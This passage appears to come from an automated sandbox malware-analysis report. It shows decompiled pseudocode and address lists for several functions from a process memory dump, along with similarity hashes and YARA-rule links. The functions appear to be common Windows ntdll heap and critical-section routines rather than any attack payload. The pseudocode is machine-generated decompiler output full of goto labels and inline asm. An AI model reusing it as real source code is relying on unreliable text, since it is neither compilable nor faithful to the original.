				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                            0x04cff71d
                                                                                            0x04cff722
                                                                                            0x04cff726
                                                                                            0x04d44770
                                                                                            0x04cff765
                                                                                            0x04cff769
                                                                                            0x04cff769
                                                                                            0x04cff732
                                                                                            0x04d4477a
                                                                                            0x00000000
                                                                                            0x04d4477a
                                                                                            0x04cff738
                                                                                            0x04cff73a
                                                                                            0x04cff73c
                                                                                            0x04cff73f
                                                                                            0x04cff746
                                                                                            0x04cff778
                                                                                            0x04cff7a9
                                                                                            0x04cff7a9
                                                                                            0x04cff754
                                                                                            0x04cff75a
                                                                                            0x04cff75d
                                                                                            0x04cff75f
                                                                                            0x04cff761
                                                                                            0x04cff76f
                                                                                            0x04cff771
                                                                                            0x04cff771
                                                                                            0x04cff76f
                                                                                            0x04cff763
                                                                                            0x00000000
                                                                                            0x04cff763
                                                                                            0x04cff77d
                                                                                            0x04cff7a3
                                                                                            0x04cff7a5
                                                                                            0x00000000
                                                                                            0x04cff7a5
                                                                                            0x04cff77f
                                                                                            0x04cff782
                                                                                            0x04cff784
                                                                                            0x04cff786
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cff788
                                                                                            0x04cff748
                                                                                            0x04cff74d
                                                                                            0x04cff78d
                                                                                            0x04cff793
                                                                                            0x04cff7b7
                                                                                            0x04cff7bc
                                                                                            0x00000000
                                                                                            0x04cff7bc
                                                                                            0x04cff798
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cff79d
                                                                                            0x04cff7b0
                                                                                            0x00000000
                                                                                            0x04cff7b0
                                                                                            0x04cff79f
                                                                                            0x00000000
                                                                                            0x04cff74f
                                                                                            0x04cff74f
                                                                                            0x00000000
                                                                                            0x04cff74f

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Actx
                                                                                            • API String ID: 0-89312691
                                                                                            • Opcode ID: acaa9249061ed2cd4327543cfccfd636710029cd425a58c0a0bc17533a9cbc5a
                                                                                            • Instruction ID: efb563a76541a956b504f83f8568ddb970d759668cc6d00c33a2e21bdb6e7c01
                                                                                            • Opcode Fuzzy Hash: acaa9249061ed2cd4327543cfccfd636710029cd425a58c0a0bc17533a9cbc5a
                                                                                            • Instruction Fuzzy Hash: 00119635304E428BEBA54D1E8C90735F2A7EB85724F28452FD661DB391EA78F9418340
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D88DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 71%
                                                                                            			E04D88DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4db0d50);
				E04D2D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04D65720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L04D2DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L04D2DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E04D2D130(_t34, _t39, _t40);
			}





                                                                                            0x04d88df1
                                                                                            0x04d88df1
                                                                                            0x04d88df1
                                                                                            0x04d88df1
                                                                                            0x04d88df1
                                                                                            0x04d88df1
                                                                                            0x04d88df3
                                                                                            0x04d88df8
                                                                                            0x04d88dfd
                                                                                            0x04d88e00
                                                                                            0x04d88e0e
                                                                                            0x04d88e2a
                                                                                            0x04d88e36
                                                                                            0x04d88e38
                                                                                            0x04d88e3c
                                                                                            0x04d88e46
                                                                                            0x04d88e46
                                                                                            0x04d88e36
                                                                                            0x04d88e50
                                                                                            0x04d88e56
                                                                                            0x04d88e59
                                                                                            0x04d88e5c
                                                                                            0x04d88e60
                                                                                            0x04d88e67
                                                                                            0x04d88e6d
                                                                                            0x04d88e73
                                                                                            0x04d88e74
                                                                                            0x04d88eb1
                                                                                            0x04d88ebd

                                                                                            Strings
                                                                                            • Critical error detected %lx, xrefs: 04D88E21
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Critical error detected %lx
                                                                                            • API String ID: 0-802127002
                                                                                            • Opcode ID: fac2b7040c2a593de4a60a669b1829d61faf74c96e04ac4f1d6b6c3519c07d0d
                                                                                            • Instruction ID: 8849cc2c276f3210711a3cbfd71be9f6520270f7ab115369c2d9b1230b7a4c15
                                                                                            • Opcode Fuzzy Hash: fac2b7040c2a593de4a60a669b1829d61faf74c96e04ac4f1d6b6c3519c07d0d
                                                                                            • Instruction Fuzzy Hash: 87118E71E00348DBDF26EFA495057EDBBB1FB14318F20416DE0696B282C3316601DF14
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D6FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04D6FF60
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                            • API String ID: 0-1911121157
                                                                                            • Opcode ID: 5a2c6fc8c5e88ae553a4e30db026b443aac853ec4228a6dd6d3274621f85d8e4
                                                                                            • Instruction ID: b251b25ebe0b12b3f8abf86d1af224daf339790e5be162d52024cd56b8789839
                                                                                            • Opcode Fuzzy Hash: 5a2c6fc8c5e88ae553a4e30db026b443aac853ec4228a6dd6d3274621f85d8e4
                                                                                            • Instruction Fuzzy Hash: 6111C071A10584EFEF12DF50DA49F98B7B2FF08708F248059E10A6B6A1C739F984CB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04DA5BA5, Relevance: .6, Instructions: 592COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 88%
                                                                                            			E04DA5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4db1178);
				E04D2D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E04DA4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E04D1D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E04DA5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x4dc60e8;
								if( *0x4dc60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x4dc60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04D19710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04D16DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E04D1F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E04D1F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E04D1F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E04D1FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E04D1FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E04D1F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E04D1F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04DA4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E04D2D130(_t427, _t494, _t511);
				}
			}










































































                                                                                            0x04da5ba5
                                                                                            0x04da5baa
                                                                                            0x04da5baf
                                                                                            0x04da5bb4
                                                                                            0x04da5bb6
                                                                                            0x04da5bbc
                                                                                            0x04da5bbe
                                                                                            0x04da5bc4
                                                                                            0x04da5bcd
                                                                                            0x04da5bd3
                                                                                            0x04da5bd6
                                                                                            0x04da5bdc
                                                                                            0x04da5be0
                                                                                            0x04da5be3
                                                                                            0x04da5beb
                                                                                            0x04da5bf2
                                                                                            0x04da5bf8
                                                                                            0x04da5bfe
                                                                                            0x04da5c04
                                                                                            0x04da5c0e
                                                                                            0x04da5c18
                                                                                            0x04da5c1f
                                                                                            0x04da5c25
                                                                                            0x04da5c2a
                                                                                            0x04da5c2c
                                                                                            0x04da5c32
                                                                                            0x04da5c3a
                                                                                            0x04da5c3f
                                                                                            0x04da5c42
                                                                                            0x04da5c48
                                                                                            0x04da5c5b
